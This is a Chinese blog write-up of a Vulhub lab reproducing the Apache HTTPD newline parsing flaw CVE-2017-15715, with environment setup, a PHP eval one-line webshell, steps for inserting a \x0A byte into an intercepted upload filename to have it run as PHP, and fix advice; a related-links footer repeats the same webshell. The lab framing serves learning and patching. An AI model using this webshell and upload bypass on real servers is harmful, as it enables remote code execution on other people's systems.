首页 > 其他分享 >Apache HTTPD-换行解析漏洞(CVE-2017-15715)

Apache HTTPD-换行解析漏洞(CVE-2017-15715)

时间:2023-09-07 22:34:43浏览次数:43  
标签:HTTPD 解析 15715 漏洞 Apache 2017 CVE php

目录

Apache HTTPD-换行解析漏洞(CVE-2017-15715)

说明 内容
漏洞编号 CVE-2017-15715
漏洞名称 Apache HTTPD 换行解析漏洞
漏洞评级 高危
影响范围 2.4.0~2.4.29
漏洞描述 在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略
修复方案 对上传文件重命名
过滤.php后缀文件
设备升级

1.1、漏洞描述

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

1.2、漏洞等级

1.3、影响版本

Apache HTTPD 2.4.0~2.4.29

1.4、漏洞复现

1、基础环境

Path:Vulhub/httpd/CVE-2017-15715


启动测试环境:

sudo docker-compose build
sudo docker-compose up -d

访问http://your-ip:{端口}/即可看到

image-20230907164237775

2、漏洞扫描

image-20230907170145860

3、漏洞验证

上传一句话木马1.phpbp拦截数据包

<?php
@eval($_REQUEST[6868]);
phpinfo();
?>

image-20230907170329858

image-20230907170351526

修改数据包

image-20230907170619263

将1.php后面的\0x2e换成一个\x0A(注意,不能是\x0D\x0A,只能是一个\x0A

image-20230907170720854

点击Send,返回响应码200

访问刚才上传的/1.php%0a,发现能够成功解析,但这个文件不是php后缀,说明目标存在解析漏洞

image-20230907170825273

image-20230907171022402

1.5、深度利用

GetShell

image-20230907171108952

image-20230907171137312

1.6、修复建议

  • 上传文件重命名
  • 禁止.php这样的文件执行
  • 升级版本

标签:HTTPD,解析,15715,漏洞,Apache,2017,CVE,php
From: https://www.cnblogs.com/saury/p/17686268.html

相关文章

  • Apache HTTPD-未知后缀名解析
    目录ApacheHTTPD-未知后缀名解析ApacheHTTPD-未知后缀名解析upload-labs/Pass-07上传1.php文件<?php@eval($_REQUEST[6868]);phpinfo();?>访问/upload/1.php.jaychou蚁剑连接......
  • OpenSSH 用户枚举漏洞(CVE-2018-15473)【原理扫描】
    最烦做等保了!!!! 有没有同感的? 修复过程记录一下,为什么要记录呢,等保漏洞每次都是那些,我一直没有进行文档记录,导致我每次都要百度搜索解决。查看当前服务器openssh的版本#当前系统版本cat/etc/redhat-releaseCentOSLinuxrelease7.9.2009(Core)ssh-vOpenSSH_7.4p1......
  • 【漏洞复现】DataEase数据可视化分析工具SQL注入-CVE-2023-40771
    1、DataEase数据可视化分析工具简介DataEase是开源的数据可视化分析工具,帮助用户快速分析数据并洞察业务趋势,从而实现业务的改进与优化。DataEase支持丰富的数据源连接,能够通过拖拉拽方式快速制作图表,并可以方便与他人分享。前端:Vue.js、Element图库:ApacheECharts、AntV后......
  • Django-SQL Injection Vulnerability (CVE-2019-14234)
    复现环境:Vulhub环境启动后,访问http://192.168.80.141:8000即可看到Django默认首页漏洞复现首先登陆后台http://192.168.80.141:8000/admin/,用户名密码为admin、a123123123。登陆后台后,进入模型Collection的管理页面http://192.168.80.141:8000/admin/vuln/collection/:然后......
  • Drupal XSS漏洞(CVE-2019-6341)
    目录漏洞复现复现环境:Vulhub环境启动后,访问http://192.168.80.141:8080/将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库漏洞复现该漏洞需要利用drupal文件模块上传文件的漏洞,伪造一个图片文件,上传,文件的内容实际......
  • weblogic-10.3.6-'wls-wsat'-XMLDecoder反序列化漏洞-(CVE-2017-10271)
    目录1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描nacsweblogicScanner3、漏洞验证说明内容漏洞编号CVE-2017-10271漏洞名称Weblogic<10.3.6'wls-wsat'XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞评级高危影响范围10.3......
  • Struts2-045 Remote Code Execution Vulnerablity(CVE-2017-5638)
    目录1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描nacs3、漏洞验证1.5、修复建议说明内容漏洞编号CVE-2017-5638漏洞名称S2-045远程代码执行漏洞漏洞评级高危影响范围Struts2.3.5-Struts2.3.31Struts2.5-Struts2.......
  • 泛微E-Office文件上传漏洞复现(CVE-2023-2523&CVE-2023-2648)
    漏洞概述cve-2023-2523泛微e-office9.5版本,源文件App/Ajax/ajax.php?action=mobile_upload_save的一些未知功能存在问题。参数upload_quwan的操作导致不受限制的上传,未经身份验证的恶意攻击者通过上传恶意文件,从而获取目标服务器的控制权限。cve-2023-2648由于泛微e-off......
  • 泛微E-cology FileDownloadForOutDoc SQL注入漏洞(CVE-2023-15672)
    漏洞简介泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。影响版本Ecology9.x补丁版本<10.58.0;Ecology8.x补丁版本<10.58.0漏洞复现fo......
  • 【漏洞复现】Jeecg-Boot 存在前台SQL注入漏洞CVE-2023-1454
    一、Jeecg-Boot简介JeecgBoot是一款基于BPM的低代码平台!前后端分离架构SpringBoot2.x,SpringCloud,AntDesign&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式OnlineCoding->代码生成器->手工MERGE,......